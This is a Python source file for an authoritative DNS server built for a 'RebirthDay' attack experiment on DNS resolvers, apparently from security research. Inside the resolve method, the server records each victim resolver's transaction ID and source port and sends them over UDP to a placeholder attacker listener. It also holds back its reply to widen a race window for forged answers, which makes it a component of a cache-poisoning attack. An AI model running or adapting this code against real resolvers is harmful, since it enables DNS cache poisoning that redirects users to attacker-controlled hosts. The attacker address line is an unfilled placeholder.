# File: server.py
# Description: An authoritative DNS server for the RebirthDay attack experiment.
# This server is designed to respond with a unique IP address for each unique
# EDNS Client Subnet (ECS) it receives, proving that a resolver's query
# aggregation has been bypassed.

import time
import struct
import socket
import logging
import sys
import hashlib

# --- Basic Configuration ---
# Configure a logger for clear, immediate output. This is more robust than print().
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
log.addHandler(handler)

# --- Library Import ---
try:
    from dnslib import DNSRecord, DNSHeader, RR, A, AAAA, QTYPE, EDNS0, EDNSOption
    from dnslib.server import DNSServer
except ImportError:
    log.critical("FATAL: dnslib library not found. Please run 'pip install dnslib'")
    sys.exit(1)

# --- Experiment Parameters ---
AUTHORITATIVE_DOMAIN = "example.com"
SERVER_IP = "0.0.0.0"
SERVER_PORT = 53
RESPONSE_DELAY = 1.5  # Race window for the attacker (in seconds)

# --- Protocol Constants ---
# The official code for the EDNS Client Subnet option is 8.
# Using the hardcoded value is more compatible across dnslib versions.
ECS_OPTION_CODE = 8

class RebirthDayAuthoritativeResolver:
    """
    A DNS resolver that simulates a legitimate, ECS-aware authoritative nameserver.
    """

    def resolve(self, request: DNSRecord, handler):
        """
        Main request handling function.
        It parses the request, logs details, and crafts a response.
        """
        log.info("=" * 60)
        log.info(f"New request received from {handler.client_address[0]}:{handler.client_address[1]}")

        # Create a reply from the request
        reply = request.reply()
        reply.header.aa = True  # Set Authoritative Answer flag

        qname = request.q.qname

        # Ignore queries for domains we are not authoritative for
        if not qname.matchSuffix(AUTHORITATIVE_DOMAIN):
            log.warning(f"Ignoring query for foreign domain: {qname}")
            return reply

        # Attempt to find an ECS option in the request
        ecs_option = self._find_ecs_option(request)

        if ecs_option:
            log.info("ECS option found, processing it to generate a unique response.")
            self._handle_ecs_query(reply, qname, ecs_option)
        else:
            log.warning("No ECS option found in the request. Sending a default response.")
            reply.add_answer(RR(qname, QTYPE.A, rdata=A("192.0.2.253"), ttl=60))

        log.info(f"Delaying response for {RESPONSE_DELAY} second(s) to create a race window...")

        victim_resolver_ip, victim_resolver_port = handler.client_address 
        #    Transaction ID generated by the victim resolver
        transaction_id = request.header.id

        log.info(f"LEAK_INFO: Captured TxID={transaction_id}, Port={victim_resolver_port} from {victim_resolver_ip}")

        # 2. Send the information to the attacker's listener port (out-of-band channel)
        #    This is a pre-agreed address
        ATTACKER_LISTENER_IP = {ATTACKER} # Assuming this is your attacker machine IP
        ATTACKER_LISTENER_PORT = 9999          # Assuming this is your listener port

        try:
            side_channel_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            payload = struct.pack('!HH', transaction_id, victim_resolver_port)
            side_channel_socket.sendto(payload, (ATTACKER_LISTENER_IP, ATTACKER_LISTENER_PORT))
            side_channel_socket.close()
            log.info(f"LEAK_SUCCESS: Sent {{TxID, Port}} to {ATTACKER_LISTENER_IP}:{ATTACKER_LISTENER_PORT}")
        except Exception as e:
            log.error(f"LEAK_FAILED: Could not send side-channel data: {e}")

        time.sleep(RESPONSE_DELAY)

        log.info("Sending response.")
        return reply

    def _find_ecs_option(self, request: DNSRecord) -> EDNSOption | None:
        """
        Robustly finds the ECS option in the request's additional records.
        This handles a quirk in some dnslib versions where EDNS options are parsed
        as a list instead of an EDNS0 object.
        """
        if not request.ar:
            return None

        for record in request.ar:
            if record.rtype == QTYPE.OPT:
                edns_data = record.rdata
                options_list = []

                if hasattr(edns_data, 'opts'):  # Standard case: rdata is an EDNS0 object
                    options_list = edns_data.opts
                elif isinstance(edns_data, list):  # Quirky case: rdata is a list of options
                    options_list = edns_data

                # Iterate through the found options to find the ECS one
                for opt in options_list:
                    if isinstance(opt, EDNSOption) and opt.code == ECS_OPTION_CODE:
                        return opt
        return None

    def _generate_unique_ip_from_subnet(self, addr_data: bytes) -> str:
        """
        **CORE LOGIC IMPROVEMENT**
        Generates a unique and deterministic IP address from the client subnet bytes.
        Instead of relying on a single octet, this uses a hash function (MD5) to ensure
        that even a small change in the input subnet results in a completely different
        output IP. This robustly proves that different queries were received.
        """
        # Use the last 2 bytes of the MD5 hash of the subnet for the last 2 octets of the IP
        digest = hashlib.md5(addr_data).digest()
        octet3 = digest[-2]
        octet4 = digest[-1]
        # We use the 198.51.100.0/24 range, which is reserved for documentation (TEST-NET-2)
        return f"198.51.{octet3}.{octet4}"

    def _handle_ecs_query(self, reply: DNSRecord, qname, ecs_option: EDNSOption):
        """
        Parses the ECS option and adds a unique answer to the reply.
        """
        try:
            family, source_prefix, scope_prefix = struct.unpack('!HBB', ecs_option.data[:4])
            addr_data = ecs_option.data[4:] # These are the truncated address bytes

            if family == 1:  # IPv4
                unique_ip = self._generate_unique_ip_from_subnet(addr_data)
                log.info(f"IPv4 ECS received ({len(addr_data)*8}-bit prefix). Generated unique IP: {unique_ip}")
                reply.add_answer(RR(qname, QTYPE.A, rdata=A(unique_ip), ttl=60))

                # A compliant server should include the ECS option in its response
                scope_prefix = source_prefix
                ecs_response_data = struct.pack('!HBB', family, source_prefix, scope_prefix) + addr_data
                response_ecs_opt = EDNSOption(ECS_OPTION_CODE, ecs_response_data)
                reply.add_ar(EDNS0(opts=[response_ecs_opt]))

            # TODO: Add similar logic for IPv6 if needed for your experiments
            elif family == 2:  # IPv6
                log.warning("Received IPv6 ECS, but IPv6 response logic is not fully implemented.")
                # You can add a similar _generate_unique_ip_from_subnet for AAAA records if required
                pass
            else:
                log.error(f"Unknown address family in ECS option: {family}")

        except (struct.error, IndexError) as e:
            log.error(f"Error while processing ECS option: {e}")


if __name__ == '__main__':
    log.info("--- RebirthDay Attack - Authoritative DNS Server ---")
    log.info(f"Authoritative for domain: '{AUTHORITATIVE_DOMAIN}', Response delay: {RESPONSE_DELAY}s")

    # The DNSServer class will handle both UDP and TCP requests
    resolver = RebirthDayAuthoritativeResolver()
    server = DNSServer(resolver, port=SERVER_PORT, address=SERVER_IP)

    try:
        log.info(f"Server starting on {SERVER_IP}:{SERVER_PORT}...")
        server.start()
    except PermissionError:
        log.critical(f"FATAL: Permission denied to bind to port {SERVER_PORT}. Please run as root or use sudo.")
    except Exception as e:
        log.critical(f"FATAL: Server failed to start: {e}")